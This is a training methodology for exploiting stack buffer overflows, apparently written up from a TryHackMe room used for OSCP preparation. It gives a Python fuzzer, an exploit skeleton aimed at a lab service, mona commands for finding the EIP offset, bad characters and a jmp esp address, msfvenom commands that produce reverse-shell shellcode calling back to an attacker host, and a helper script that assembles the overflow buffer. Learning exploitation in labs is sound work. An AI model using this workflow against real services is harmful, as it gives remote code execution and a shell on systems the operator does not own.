Buffer Overflow Methodology
Buffer Overflow Methodology for OSCP from TryHackMe Buffer Overflow Prep
1. Fuzz application to find number of bytes needed to crash the application
import socket, time, sys

ip = "10.10.50.84"
port = 1337
timeout = 5
prefix = "OVERFLOW1 "    # command the target expects before the payload

string = prefix + "A" * 100

# Send 100, 200, 300, ... bytes of "A" until the service stops answering;
# the last length printed is roughly where it crashed.
while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)    # banner
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)    # response; raises (timeout/reset) once the process has crashed
    except:
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)
2. Set mona configuration (%p expands to the debugged process name; bytearray and compare output land in this folder)
!mona config -set workingfolder c:\mona\%p
3. Find EIP offset
Send a cyclic pattern of the crash length (!mona pc <length> or msf-pattern_create -l <length>) as the payload, then read the offset from the crashed EIP value with !mona findmsp -distance <length>. Put that value in eip_offset and confirm it with four "B"s in retn: EIP must read 42424242.
import socket

ip = "10.10.50.84"
port = 1337

prefix = "OVERFLOW1 "    # command prefix the target expects (same as in the fuzzer)
eip_offset = 0           # bytes needed to reach the saved return address
overflow = "A" * eip_offset
retn = ""        # jmp esp address, little-endian: 0x625011af is written as "\xaf\x11\x50\x62"
padding = ""     # NOP sled, e.g. "\x90" * 24
payload = ""     # shellcode from msfvenom
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except:
    print("Could not connect.")
4. Find bad characters
Generate the byte array in mona. \x00 is excluded from the start because it terminates C strings; add every further bad character you find to -b:
!mona bytearray -b "\x00"
Paste the Python string from bytearray.txt (in the mona working folder) into the payload variable, send it, and compare the bytes at ESP against the file. -a takes the ESP value shown at the crash:
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>
A bad character often corrupts the bytes after it, so exclude only the first reported byte, regenerate the array and repeat until mona reports it unmodified.
5. Find a jmp esp instruction without any bad characters
Insert the bad characters after the -cpb flag. Pick an address from a module without ASLR, rebase or SafeSEH whose address bytes contain none of the bad characters:
!mona jmp -r esp -cpb "\x00"
6. Generate shellcode
Insert the bad characters after the -b flag. EXITFUNC=thread (Windows payloads) lets the target process survive when the shell exits. The -f c output pastes straight into the payload variable, since adjacent string literals concatenate in Python too.
Windows -
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00" -f c
Linux -
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b "\x00" -f c
7. Set nop sled in padding
The msfvenom decoder stub writes to the stack just below ESP while unpacking and can overwrite the first bytes of the shellcode, so separate the two with a NOP sled:
padding = "\x90" * 24
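The offset, bad-character and buffer-assembly steps above can be checked offline before touching the target. The following is an added example, not code from the TryHackMe room: it generates the same cyclic pattern as msf-pattern_create / !mona pc, recovers the offset from a crashed EIP value, builds and diffs a bad-character array the way !mona compare does, screens shellcode for bad bytes, and assembles the final buffer with the return address packed little-endian. The target address, the OVERFLOW1 prefix and the 0x625011af jmp esp address are the ones from this page; the EIP value 0x6F43396E used in the demo and the placeholder shellcode are constructed sample values.

```python
#!/usr/bin/env python3
"""Offline helpers for the offset / bad-char / buffer steps (added example).

Assumptions: target 10.10.50.84:1337 and prefix "OVERFLOW1 " as on the page,
jmp esp at 0x625011af as on the page; the sample EIP value and shellcode
below are constructed for the demo, not captured from a real crash.
"""
import socket
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0... (digit varies fastest)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, eip):
    """Offset of the four pattern bytes that landed in EIP.

    x86 is little-endian, so the value the debugger shows is the buffer bytes
    reversed; packing it with "<I" restores the original order. -1 if absent.
    """
    needle = struct.pack("<I", eip).decode("latin-1")
    return pattern.find(needle)


def badchar_array(exclude=b"\x00"):
    """Bytes \\x01..\\xff minus the ones already known bad (like !mona bytearray -b)."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_badchar(sent, observed):
    """First byte of `sent` that differs in the memory dump `observed`.

    Mirrors !mona compare: only the first corrupted byte is trustworthy,
    because a bad character usually mangles or truncates everything after it.
    Returns None when the array survived unmodified.
    """
    for s, o in zip(sent, observed):
        if s != o:
            return s
    if len(observed) < len(sent):
        return sent[len(observed)]      # truncated: the next byte is the culprit
    return None


def contains_badchars(shellcode, badchars):
    """Bad bytes present in the encoded shellcode; should be empty before sending."""
    return sorted(set(shellcode) & set(badchars))


def build_buffer(prefix, offset, ret_addr, nop_len, shellcode, postfix=b"\r\n"):
    """prefix + A*offset + ret (little-endian) + NOP sled + shellcode + postfix."""
    return (prefix + b"A" * offset + struct.pack("<I", ret_addr)
            + b"\x90" * nop_len + shellcode + postfix)


def send_buffer(ip, port, buf, timeout=5):
    """Deliver the assembled buffer; only called when you actually run the exploit."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)
        s.send(buf)


if __name__ == "__main__":
    pat = pattern_create(2000)
    offset = pattern_offset(pat, 0x6F43396E)      # constructed sample EIP value
    print("EIP offset:", offset)
    arr = badchar_array(b"\x00")
    # Constructed dump in which \x0a came back as \x00.
    dump = arr[:9] + b"\x00" + arr[10:]
    print("first bad char: 0x%02x" % first_badchar(arr, dump))
    shellcode = b"\xcc" * 8                       # placeholder, not real shellcode
    print("bad bytes in shellcode:", contains_badchars(shellcode, b"\x00\x0a"))
    buf = build_buffer(b"OVERFLOW1 ", offset, 0x625011af, 24, shellcode)
    print("buffer length:", len(buf))
    # send_buffer("10.10.50.84", 1337, buf)       # uncomment against the target
```

Run it against a real crash by replacing the sample EIP value with the one the debugger shows; the returned offset is what goes into eip_offset in the exploit script, and contains_badchars should be empty for the msfvenom output before it is sent.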